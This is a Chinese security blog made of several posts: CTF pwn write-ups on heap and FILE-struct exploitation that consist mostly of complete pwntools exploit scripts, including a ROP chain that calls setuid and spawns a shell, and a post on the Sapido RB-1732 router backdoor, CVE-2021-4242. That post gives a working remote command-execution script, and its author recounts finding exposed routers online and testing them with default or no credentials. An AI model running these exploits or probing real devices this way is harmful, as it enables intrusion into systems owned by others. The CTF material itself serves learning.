        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)
    malloc(0, 0)
    malloc(0, 1)

    printf(0, 0)
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little")

    printf(0, 1)
    thread[0].recvuntil(b"MESSAGE: ")
    pos = int.from_bytes(thread[0].recvline().strip(), "little")
    heap = demangle(heap, pos)
    main_arena_ptr = heap - 0xAA1
    thread_stdout = heap - 0x5F1

    thread[0].success(f"pos: {hex(pos)}")
    thread[0].success(f"heap: {hex(heap)}")
    thread[0].success(f"main_arena_ptr: {hex(main_arena_ptr)}")
    thread[0].success(f"thread_stdout: {hex(thread_stdout)}")

    raw_input("DEBUG")
    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)

    arbitrary_read(0, 1, mangle(pos - 1, main_arena_ptr))
    thread[0].recvuntil(b"MESSAGE: ")
    libc.address = int.from_bytes(thread[0].recvline().strip(), "little") - 0x219C80
    heap_ptr = libc.address + 0x219CE0
    __GI__IO_wfile_overflow = libc.address + 0x215FE0

    thread[0].success(f"libc: {hex(libc.address)}")
    thread[0].success(f"heap_ptr: {hex(heap_ptr)}")
    thread[0].success(f"__GI__IO_wfile_overflow: {hex(__GI__IO_wfile_overflow)}")

    raw_input("DEBUG")
    malloc(0, 2)
    malloc(0, 4)
    free(0, 4)
    free(0, 2)

    arbitrary_read(2, 4, mangle(pos, heap_ptr))
    thread[0].recvuntil(b"MESSAGE: ")
    heap = int.from_bytes(thread[0].recvline().strip(), "little") - 0x530
    empty_buffer = heap + 0x1000

    thread[0].success(f"heap: {hex(heap)}")
    thread[0].success(f"empty_buffer: {hex(empty_buffer)}")

    raw_input("DEBUG")
    malloc(0, 3)
    malloc(0, 5)
    free(0, 5)
    free(0, 3)

    #   0x7fbcf9683b94 <_IO_wdoallocbuf+36>    mov    rax, qword ptr [rax + 0xe0]
    # ► 0x7fbcf9683b9b <_IO_wdoallocbuf+43>    call   qword ptr [rax + 0x68]

    leave_ret = libc.address + 0x4DA83
    pop_rdi_ret = libc.address + 0x2A3E5
    pop_rsi_ret = libc.address + 0x2BE51
    pop_rbp_ret = libc.address + 0x2A2E0
    pop_rax_ret = libc.address + 0x45EB0
    one_gadget = libc.address + 0xEBD43
    dup2 = libc.sym["dup2"]
    syscall_ret = libc.address + 0x91316

    payload = flat(
        {
            0x68: leave_ret,
            0xE0: empty_buffer,
            0xE8: pop_rdi_ret,
            0xF0: 5,
            0xF8: pop_rsi_ret,
            0x100: 0,
            0x108: dup2,
            0x110: pop_rsi_ret,
            0x118: 1,
            0x120: dup2,
            0x128: pop_rdi_ret,
            0x130: 0,
            0x138: pop_rax_ret,
            0x140: constants.SYS_setuid,
            0x148: syscall_ret,
            0x150: one_gadget,
        },
        filler=b"\x00",
    )
    arbitrary_write(3, 5, mangle(pos, empty_buffer), payload)

    raw_input("DEBUG")
    malloc(0, 6)
    malloc(0, 7)
    free(0, 7)
    free(0, 6)

    fp = FileStructure()
    fp._lock = heap + 0x2000
    fp._wide_data = empty_buffer
    fp.vtable = __GI__IO_wfile_overflow

    fp._IO_read_ptr = pop_rbp_ret
    fp._IO_read_end = heap + (0x1000 + 0xE8) - 0x8
    fp._IO_read_base = leave_ret

    arbitrary_write(6, 7, mangle(pos, thread_stdout + 0x3), bytes(fp))

    # thread[0].clean()
    printf(0, 0)

    thread[0].interactive()


if __name__ == "__main__":
    main()

Level 9

Information

Category: Pwn

Description

Create and use arbitrary read/write primitives with less control of the heap.

Write-up

堆噪声是吧，看上去好像很可怕，也只是看上去罢了。实际上这干扰有和没有都没啥区别……至少在这题里是这样的。

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    context,
    flat,
    os,
    process,
    raw_input,
    remote,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "/challenge/babyprime_level9.1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def printf(tid, idx):
    thread[tid].sendline(f"printf {idx}".encode())


def malloc(tid, idx):
    thread[tid].sendline(f"malloc {idx}".encode())


def scanf(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} {content}".encode())


def scanf_raw(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} ".encode() + content)


def free(tid, idx):
    thread[tid].sendline(f"free {idx}".encode())


def send_flag(tid, flag):
    thread[tid].sendline(b"send_flag")
    thread[tid].sendlineafter(b"Secret: ", flag)


def quit(tid):
    thread[tid].sendline(b"quit")


def arbitrary_read(poison_idx, result_idx, addr):
    BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}

    packed_addr = flat(addr)
    if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
        raise ValueError(
            f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}"
        )

    while True:
        thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000)
        if os.fork() == 0:
            thread[1].send(
                (f"scanf {poison_idx}".encode() + packed_addr + b"\n") * 10000
            )
            os.kill(os.getpid(), 9)
        os.wait()

        malloc(0, poison_idx)
        printf(0, poison_idx)
        thread[0].recvuntil(b"MESSAGE: ")
        poisoned = int.from_bytes(thread[0].recvline().strip(), "little")

        if flat(poisoned) == packed_addr:
            break

    raw_input("DEBUG")
    malloc(0, result_idx)
    printf(0, result_idx)


def arbitrary_write(poison_idx, result_idx, addr, content):
    arbitrary_read(poison_idx, result_idx, addr)
    raw_input("RAW SCANF")
    scanf_raw(0, result_idx, content)


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, thread

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    malloc(0, 0)
    printf(0, 0)

    thread[0].recvuntil(b"MESSAGE: ")
    pos = int.from_bytes(thread[0].recvline().strip(), "little")
    flag = (pos << 12) + 0xBD0

    thread[0].success(f"pos: {hex(pos)}")
    thread[0].success(f"flag: {hex(flag)}")

    malloc(0, 0)
    malloc(0, 1)
    free(0, 1)
    free(0, 0)

    arbitrary_read(0, 1, mangle(pos, flag + 0x10))

    thread[0].recvuntil(b"MESSAGE: ")
    secret = thread[0].recvline()
    send_flag(0, secret)

    quit(0)
    quit(1)

    thread[0].interactive()


if __name__ == "__main__":
    main()

Level 10

Information

Category: Pwn

Description

Create and use arbitrary read/write primitives with less control of the heap II.

Write-up

~~吃屎吃的最难受的一集。~~

不想破伪随机数发生器，那就想办法确定你能确定的，想办法猜出你不能确定的（

Exploit

#!/usr/bin/env python3

import argparse

from pwn import (
    ELF,
    FileStructure,
    context,
    flat,
    os,
    process,
    raw_input,
    remote,
    sys,
)

parser = argparse.ArgumentParser()
parser.add_argument("-L", action="store_true")
parser.add_argument("-T", "--threads", type=int, default=None, help="thread count")
args = parser.parse_args()


FILE = "/challenge/babyprime_level10.0"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary
libc = elf.libc


def printf(tid, idx):
    thread[tid].sendline(f"printf {idx}".encode())


def malloc(tid, idx):
    thread[tid].sendline(f"malloc {idx}".encode())


def scanf(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} {content}".encode())


def scanf_raw(tid, idx, content):
    thread[tid].sendline(f"scanf {idx} ".encode() + content)


def free(tid, idx):
    thread[tid].sendline(f"free {idx}".encode())


def quit(tid):
    thread[tid].sendline(b"quit")


def arbitrary_read(poison_idx, result_idx, addr):
    global rand_size

    BAD_BYTES = {b"\x20", b"\x0c", b"\x0a", b"\x0d", b"\x09", b"\x0b"}

    packed_addr = flat(addr)
    if any(bytes([byte]) in BAD_BYTES for byte in packed_addr):
        raise ValueError(
            f"Address {hex(addr)} contains a bad byte for scanf: {packed_addr.hex()}"
        )

    while True:
        thread[0].send((f"malloc {poison_idx} free {poison_idx}\n".encode()) * 10000)
        if os.fork() == 0:
            thread[1].send(
                (f"scanf {poison_idx}".encode() + packed_addr + b"\n") * 10000
            )
            os.kill(os.getpid(), 9)
        os.wait()

        malloc(0, poison_idx)
        printf(0, poison_idx)
        thread[0].recvuntil(b"MESSAGE: ")
        poisoned = int.from_bytes(thread[0].recvline().strip(), "little")

        if flat(poisoned) == packed_addr:
            break

    # raw_input("DEBUG")
    malloc(0, result_idx)
    printf(0, result_idx)


def arbitrary_write(poison_idx, result_idx, addr, content):
    arbitrary_read(poison_idx, result_idx, addr)
    # raw_input("RAW SCANF")
    scanf_raw(0, result_idx, content)


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target, thread

    if args.L and args.threads is not None:
        raise ValueError("Options -L and -T cannot be used together.")

    if args.L:
        target = process(FILE)
    elif args.threads:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        process(FILE)

        thread = [remote(HOST, PORT, ssl=False) for _ in range(args.threads)]
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    thread[0].recvuntil(b"Your flag is: ")
    flag_p0 = thread[0].recvuntil(b"..!\n")[:-4]
    thread[0].success(f"flag_p0: {flag_p0}")

    malloc(0, 0)
    free(0, 0)
    malloc(0, 0)
    printf(0, 0)

    thread[0].recvuntil(b"MESSAGE: ")
    pos = int.from_bytes(thread[0].recvline().strip(), "little")
    heap = pos << 12

    hexpos = hex(pos)[2:]
    if len(hexpos) != 9:
        thread[0].failure(f"invalid pos (need equal to 9 hex digits): {hex(pos)}")
        try:
            thread[0].close()
            thread[1].close()
        except:
            pass
        os.execv(sys.executable, [sys.executable] + sys.argv)

    thread_stdout = heap - 0x102B0
    secret = thread_stdout + 0x3C0

    thread[0].success(f"pos: {hex(pos)}")
    thread[0].success(f"stdout: {hex(thread_stdout)}")
    thread[0].success(f"secret: {hex(secret)}")

    expected_low = 0x0D50
    low_16 = thread_stdout & 0xFFFF

    if low_16 != expected_low:
        thread[0].failure(f"bad stdout low bits: {hex(low_16)} != {hex(expected_low)}")

        try:
            thread[0].close()
            thread[1].close()
        except:
            pass

        os.execv(sys.executable, [sys.executable] + sys.argv)

    # raw_input("DEBUG")
    malloc(0, 2)
    malloc(0, 4)
    free(0, 4)
    free(0, 2)

    fp = FileStructure()
    fp.write(secret, 0x100)
    fp.fileno = 5

    arbitrary_write(
        2,
        4,
        mangle((pos) - 0x3, thread_stdout),
        fp.struntil("_flags2"),
    )
    malloc(0, 10)

    thread[0].interactive()


if __name__ == "__main__":
    main()

Sapido RB-1732 路由器 RCE 漏洞

Sat, 15 Nov 2025 00:00:00 GMT

import CveCard from "@components/misc/CveCard.astro";

前言

所以，这是我入门 IoT 复现的第一个漏洞 :D

看到 Arch Linux ~~神（邪）教~~被孤立还是很难过的……最后迫不得已，还是搭建了 AttifyOS 虚拟机，老老实实用它仿真，不过分析和写 exp 这种事情还是在宿主机进行，其实感觉还好，整个流程并没有让我觉得有多麻烦。

~~嗯……有空研究一下市面上仿真项目的源码，然后写一个适用于 arch 的仿真工具孤立所有非我教者（~~

漏洞介绍

好了，不瞎扯了，说点正经的……搜了一下，这个漏洞的 CVE 是：CVE-2021-4242，说实话一开始以为是一个很老的漏洞，没想到也就近几年。

对于这个洞的描述是：

说白了就是一个没有过滤后门页面的访问的问题，虽然洞很简单，但这里主要是为了学习，体会实战中如何寻找漏洞的一个思路，而不是为了复现而复现。

固件仿真

~~仿真还不是 easy peasy，只要人品足够好，不是吗？~~

这里我使用的是 Firmware Analysis Toolkit，直接梭掉了，没有遇到什么奇奇怪怪的问题。~~人品保障（~~

为了方便测试，这里我写了一个无比简陋的端口转发脚本，这样就可以从宿主机访问仿真出来的路由器后端了：

#!/bin/bash

TARGET_IP="$1"
PORT_RULES="$2"

if [[ -z "$TARGET_IP" || -z "$PORT_RULES" ]]; then
  echo "usage: $0 <target_ip> \"<host_port:target_port> <host_port:target_port> ...\""
  exit 1
fi

if ! command -v socat >/dev/null 2>&1; then
  echo "[-] socat not found."
  exit 1
fi

echo "[*] Target IP: $TARGET_IP"
echo "[*] Rules: $PORT_RULES"
echo

for rule in $PORT_RULES; do
  HOST_PORT="${rule%%:*}"
  TARGET_PORT="${rule##*:}"

  echo "[+] Forwarding host: $HOST_PORT → $TARGET_IP:$TARGET_PORT"

  socat TCP-LISTEN:"$HOST_PORT",fork TCP:"$TARGET_IP":"$TARGET_PORT" &

  PID=$!
  echo "    Started (PID=$PID)"
done

echo
echo "[OK] All forwarding rules loaded."

漏洞分析

闭眼 binwalk，~~幸运女神保佑我，别加密，别加密（~~

正合我意，是没有加密的 SquashFS 文件系统。下面随机抓一个倒霉蛋问问架构：

Well，32-bit 大端 MIPS，现在基本的信息算是搜集的差不多了，接下来就应该去分析它是如何把 http 服务跑起来的了。

我们发现 /etc/init.d 下有三个文件，rcS、rcS_16M 和 rcS_32M，盲猜后两个是设计用于特定内存大小使用的，我们直接看 rcS 就好了，另外两个也大差不差。

快速过一遍这个脚本，大致可以看出来就是做了一些初始化工作，诸如网络设置，硬件检测啦之类的事情，最后，我们凭借敏锐的注意力发现它在一切准备就绪后执行了一个叫做 webs 的程序：

盲猜这个路由器就是通过它来启服务的。找到入口后，发现是 ELF 文件，那就丢给 IDA 姐姐分析一下看看它偷偷摸摸地在幕后做了些什么坏坏的事情（

~~然后发现已经快凌晨四点了，这说明白天睡觉的效益并不大，早岁晚起才是真理（~~

粗略看了一下，就是很常规的启动 web 服务器，注册 cgi-bin 和 goform handlers 用于执行实际操作：

其中有一个疑似后门的 form handler：

直接进入函数分析分析它到底干了点啥：

int __fastcall formSysCmd(int a1)
{
  int Var; // $s4
  const char *v3; // $s1
  _BYTE *v4; // $s5
  int v5; // $s6
  const char *p_writepath; // $s3
  _BYTE *v7; // $s7
  int v8; // $v0
  _DWORD *v9; // $s0
  int v10; // $a0
  const char *Var_1; // $a1
  int v12; // $v0
  int v13; // $s1
  void (__fastcall *p_fputc)(int, _DWORD *); // $t9
  _BYTE *v15; // $a0
  _BYTE *v16; // $a3
  int v17; // $a0
  int v18; // $v0
  char p_writepath_1[104]; // [sp+20h] [-68h] BYREF

  Var = websGetVar(a1, "submit-url", &dword_47F498);
  v3 = (const char *)websGetVar(a1, "sysCmd", &dword_47F498);
  v4 = (_BYTE *)websGetVar(a1, "writeData", &dword_47F498);
  v5 = websGetVar(a1, "filename", &dword_47F498);
  p_writepath = (const char *)websGetVar(a1, "fpath", &dword_47F498);
  v7 = (_BYTE *)websGetVar(a1, "readfile", &dword_47F498);
  if ( *v3 )
  {
    snprintf(p_writepath_1, 100, "%s 2>&1 > %s", v3, "/tmp/syscmd.log");
    system(p_writepath_1);
  }
  if ( *v4 )
  {
    strcpy(p_writepath_1, p_writepath);
    strcat(p_writepath_1, v5);
    v8 = fopen(p_writepath_1, "w");
    v9 = (_DWORD *)v8;
    if ( !v8 )
    {
      printf("Open %s fail.\n", p_writepath_1);
      v10 = a1;
      Var_1 = (const char *)Var;
      return websRedirect(v10, Var_1);
    }
    v13 = 0;
    v12 = fileno(v8);
    fchmod(v12, 511);
    if ( *(int *)(a1 + 240) > 0 )
    {
      while ( 1 )
      {
        p_fputc = (void (__fastcall *)(int, _DWORD *))&fputc;
        if ( !v9[13] )
          break;
        v15 = (_BYTE *)v9[4];
        p_fputc = (void (__fastcall *)(int, _DWORD *))&_fputc_unlocked;
        v16 = (_BYTE *)(*(_DWORD *)(a1 + 204) + v13);
        if ( (unsigned int)v15 >= v9[7] )
        {
          v17 = (char)*v16;
LABEL_12:
          p_fputc(v17, v9);
          goto LABEL_13;
        }
        *v15 = *v16;
        v9[4] = v15 + 1;
LABEL_13:
        if ( ++v13 >= *(_DWORD *)(a1 + 240) )
          goto LABEL_14;
      }
      v17 = *(char *)(*(_DWORD *)(a1 + 204) + v13);
      goto LABEL_12;
    }
LABEL_14:
    fclose(v9);
    printf("Write to %s\n", p_writepath_1);
    strcpy(&writepath, p_writepath);
  }
  if ( *v7 && (v18 = fopen(p_writepath, "r")) != 0 )
  {
    fclose(v18);
    sprintf(p_writepath_1, "cat %s > /web/obama.dat", p_writepath);
    system(p_writepath_1);
    usleep(10000);
    v10 = a1;
    Var_1 = "/obama.dat";
  }
  else
  {
    v10 = a1;
    Var_1 = (const char *)Var;
  }
  return websRedirect(v10, Var_1);
}

我们发现它获取了 sysCmd 后并构造了一个 <sysCmd> 2>&1 > /tmp/syscmd.log 指令，保存在 p_writepath_1，然后直接调用 system(p_writepath_1)。那我们如果可以控制 sysCmd 的话就能执行任意代码了，所以下面应该找一下哪里使用了这个 form。

下面是使用 ripgrep 搜索的结果：

发现除了 webs 这个二进制文件外，还有 web/syscmd.asp 和 web/obama.asp 也包含了这个 form，直接跟进，对比发现这两个文件的区别就在于提供的功能数量，obama.asp 比 syscmd.asp 多提供了操作文件的功能，而我们最关心的 sysCmd 被定义为一个输入框，即我们可控它的内容：

漏洞利用

上面有关这个 CVE 的漏洞分析的就差不多了，我们可以试试能不能直接访问 syscmd.asp 和 obama.asp 这两个页面，不过测试发现没登陆的情况下访问会被重定向回到登陆页面，网上搜到了这个路由器的默认账号密码是 admin/admin，用它登陆后再访问就进去了，发现和我们分析的一模一样，可以执行任意指令，并且 obama.asp 的功能更多：

btw 有些不同型号的是 htm 而不是 asp，这个可以自己测试一下。

~~不过为什么要用美国总统的名字？？好奇怪呀……~~

资产收集

只是打本地多没意思，我们玩的可是实战。本来只是抱着试一试的心态尝试 ZoomEye 和 FOFA 看看能不能找到一别暴露在公网的服务，结果意外地搜出一堆……大家安全意识都那么薄弱的吗？而且测试发现大多数暴露在外的服务都没有修复这个漏洞，随便抓一个倒霉蛋发现甚至连默认账号密码都没改，有些甚至不用登陆就直接进管理面板了……

Exploit

开开心心去写 exp 咯～

#!/usr/bin/env python3

import requests
from pwn import log, sys


def rce(host, port, cmd):
    payload = {
        "sysCmd": cmd,
        "apply": "Apply",
        "submit-url": "/obama.asp",
    }

    try:
        r = requests.post(
            f"http://{host}:{port}/goform/formSysCmd",
            data=payload,
            timeout=5,
        )
    except Exception as e:
        log.error(f"HTTP request failed: {e}")

    text = r.text
    start_tag = '<textarea rows="15" name="msg" cols="80" wrap="virtual">'
    end_tag = "</textarea>"

    start = text.find(start_tag)
    end = text.rfind(end_tag)

    if start < 0 or end < 0:
        log.warn("Output parsing failed.")
        return text

    return text[start + len(start_tag) : end]


def main():
    log.success(rce(sys.argv[1], sys.argv[2], sys.argv[3]))


if __name__ == "__main__":
    main()

修复建议

这种后门页面完全没必要公开出来吧，应该直接删掉才是，而且我并没有看到有什么地方需要用到这个后门页面进行什么操作。就算要保留也应该对可以使用的指令做一个过滤才是。

后记

至此，人生中第一个路由器 RCE 漏洞复现成功，我也算是真正步入 IoT 的世界了，不过说实话从这个漏洞中我可能并没有学到太多东西，只是对如何寻找漏洞，对常见路由器设备的架构以及其可能的攻击面有了一个粗略的了解吧，总的来说收获不是很大，但这个独自研究摸索的过程还是很快乐的。

Write-ups: Software Exploitation (File Struct Exploits) series (Completed)

Mon, 03 Nov 2025 00:00:00 GMT

前言

Finally，花了五个月差不多把 pwn 学完了，至于剩下的内核什么的后期就当兴趣学了，应该不会变成我的主要研究方向，所以等学完这两章 FSOP 的内容我就去搞 IoT，~~也能想象明年开始将全力以赴打比赛，暗无天日的坐牢（~~

总之希望竞赛时期不要太长，最好能够一年退役，我可不想整个大学生活都在坐牢 LOL

Level 1

Information

Category: Pwn

Description

Harness the power of FILE structs to arbitrarily read data.

Write-up

~~最简单的一集。~~ chall 把 flag 读到 bss 了，并且没开 PIE，还给了任意写 FILE 结构体的能力，直接用 pwntools 秒了。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level1"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    flag = 0x4040E0

    fp = FileStructure()
    payload = flat(fp.write(flag, 0x64))

    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Level 2

Information

Category: Pwn

Description

Harness the power of FILE structs to arbitrarily write data to bypass a security check.

Write-up

验证变量，构造任意读即可。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level2"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    authenticated = 0x4041F8

    fp = FileStructure()
    payload = flat(fp.read(authenticated, 0x101))

    target.success(fp)

    target.send(payload)
    target.sendline(b"A" * 0xFF)

    target.interactive()


if __name__ == "__main__":
    main()

Level 3

Information

Category: Pwn

Description

Harness the power of FILE structs to redirect data output.

Write-up

以后每题都那么简单就好了（

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level3"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.send(b"\x01")

    target.interactive()


if __name__ == "__main__":
    main()

Level 4

Information

Category: Pwn

Description

Harness the power of FILE structs to arbitrarily read/write data to hijack control flow.

Write-up

越来越有趣了之，File Structure 的千层套路（

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level4"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"stored at: ")
    ret = int(target.recvline().strip(), 16)

    fp = FileStructure()
    payload = flat(fp.read(ret, 0x101))

    target.send(payload)
    target.send(flat(elf.sym["win"]).ljust(0x101, b"\x00"))

    target.interactive()


if __name__ == "__main__":
    main()

Level 5

Information

Category: Pwn

Description

Abuse built-in FILE structs to leak sensitive information.

Write-up

能改 stdout 结构体，并且 puts 函数内部会使用 stdout 结构体中的指针来输出值，所以我们只要改掉 write 的几个指针，过一下检查，并且把 flag 设置为 0xfbad1800 就好了。

int
_IO_puts (const char *str)
{
  int result = EOF;
  size_t len = strlen (str);
  _IO_acquire_lock (stdout);

  if ((_IO_vtable_offset (stdout) != 0
       || _IO_fwide (stdout, -1) == -1)
      && _IO_sputn (stdout, str, len) == len
      && _IO_putc_unlocked ('\n', stdout) != EOF)
    result = MIN (INT_MAX, len + 1);

  _IO_release_lock (stdout);
  return result;
}

weak_alias (_IO_puts, puts)
libc_hidden_def (_IO_puts)

0x1000 代表追加到当前 fileno 后面，0x0800 代表正在执行写入操作。

#define _IO_CURRENTLY_PUTTING 0x0800
#define _IO_IS_APPENDING      0x1000

不过实际上我们也不用改那么多 write 指针，只要把最重要的 _IO_write_base 改掉就好了，剩下的使用残留值。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level5"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    flag = 0x4040C0

    fp = FileStructure()
    fp.flags = 0xFBAD1800
    fp._IO_write_base = flag
    fp._IO_write_ptr = flag + 0x64
    fp._IO_write_end = flag + 0x64
    payload = flat(fp.struntil("_IO_write_end"))

    raw_input("DEBUG")
    target.send(payload)

    target.interactive()


if __name__ == "__main__":
    main()

Level 6

Information

Category: Pwn

Description

Abuse built-in FILE structs to bypass a security check.

Write-up

上题是改 stdout 使 puts 任意写，这题是改 stdio 使 scanf 任意读。

scanf 的话只要设置 _IO_NO_WRITES 标志并设置 _IO_buf_base 和 _IO_buf_end 就好了，和那几个 read 指针无关。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level6"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    authenticated = 0x4041F8

    fp = FileStructure()
    fp.flags = 0xFBAD0008
    fp._IO_buf_base = authenticated
    fp._IO_buf_end = authenticated + 0x8
    payload = flat(fp.struntil("_IO_buf_end"))

    raw_input("DEBUG")
    target.send(payload)
    target.sendlineafter(b"Please log in.", b"\x01")

    target.interactive()


if __name__ == "__main__":
    main()

Level 7

Information

Category: Pwn

Description

Create a fake _wide_data struct to hijack control of the virtual function table of a FILE struct.

Write-up

人生中第一道 vtable，也是灰常的简单呢 :D 一开始我看这 description 说是打 vtable 还感觉可能有点难，然非也哈哈哈。

这题就是折腾折腾几个指针而已，要点就是让调用 fwrite 时使用的 FILE structure 的 vtable + 0x38 处保存 __GI__IO_wfile_overflow 的地址，然后这个 __GI__IO_wfile_overflow 内部会调用 _IO_wdoallocbuf，这个函数内部又会调用传给 fwrite 的 FILE structure 的 _wide_data + 0x68 处的函数，我们伪造 _wide_data，令其 +0x68 处保存的是 win 函数地址即可。

一题打消第一次接触 vtable 的恐惧，开心。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level7"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
    if shifted:
        return pos ^ ptr
    return (pos >> 12) ^ ptr


def demangle(pos, ptr, shifted=1):
    if shifted:
        return mangle(pos, ptr)
    return mangle(pos, ptr, 0)


def launch():
    global target
    if args.L:
        target = process(FILE)
    else:
        target = remote(HOST, PORT, ssl=True)


def main():
    launch()

    target.recvuntil(b"libc is: ")
    libc = int(target.recvline().strip(), 16) - 0x84420
    __GI__IO_wfile_overflow = libc + 0x1E8DC0

    target.recvuntil(b"located at: ")
    buf = int(target.recvline().strip(), 16)

    target.success(f"libc: {hex(libc)}")
    target.success(f"buf: {hex(buf)}")

    payload = flat(
        {
            0x68: elf.sym["win"],
            0xE0: buf,
        },
        filler=b"\x00",
    )
    raw_input("DEBUG")
    target.sendafter(b"Please enter your name.\n", payload)

    fp = FileStructure()
    fp._lock = buf
    fp._wide_data = buf
    fp.vtable = __GI__IO_wfile_overflow

    raw_input("DEBUG")
    target.sendafter(
        b"Now reading from stdin directly to the FILE struct.\n", bytes(fp)
    )

    target.interactive()


if __name__ == "__main__":
    main()

Level 8

Information

Category: Pwn

Description

Create a fake _wide_data struct to hijack control of the virtual function table of a FILE struct.

Write-up

和上题差不多，结构体 overlapping 就好了。

Exploit

#!/usr/bin/env python3

from pwn import (
    ELF,
    FileStructure,
    args,
    context,
    flat,
    process,
    raw_input,
    remote,
)


FILE = "/challenge/babyfile_level8"
HOST, PORT = "localhost", 1337

context(log_level="debug", binary=FILE, terminal="kitty")

elf = context.binary


def mangle(pos, ptr, shifted=1):
